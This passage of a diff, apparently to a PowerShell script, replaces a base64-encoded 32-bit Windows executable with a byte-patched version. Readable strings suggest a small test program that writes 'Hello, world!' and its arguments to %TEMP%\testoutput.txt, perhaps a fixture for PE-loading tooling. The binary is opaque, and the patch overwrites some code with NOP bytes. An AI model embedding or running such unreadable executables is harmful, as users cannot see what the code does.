ACfAV9fZGxsb25leGl0AAIEX29uZXhpdADuAEVuY29kZVBvaW50ZXIAqQNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDHAUdldEN1cnJlbnRQcm9jZXNzSWQAywFHZXRDdXJyZW50VGhyZWFkSWQAAIACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAywBEZWNvZGVQb2ludGVyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD+/////////wAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAJgQAABAIgAAmBAAAHwRAABQIgAAfBEAAIwRAABoIgAAjBEAAFoSAAB4IgAAXBIAAL8SAACAIgAAwBIAADAUAACIIgAAMBQAAEIUAAB4IgAARBQAAHwUAAB4IgAAfBQAAJMUAAB4IgAA8BQAAD0VAACoIgAAcBUAABwWAADMIgAAIBYAAG4WAAAAIwAAcBYAACAXAADYIgAAIBcAADcXAAB4IgAAOBcAAHAXAAAIIwAAcBcAAKgXAAAIIwAA4BcAAP4XAAD4IgAAABgAACAYAAD4IgAAIBgAADsYAAD4IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACihQKFIoVChCKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitExe = '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'
+	$Encoded32BitExe = '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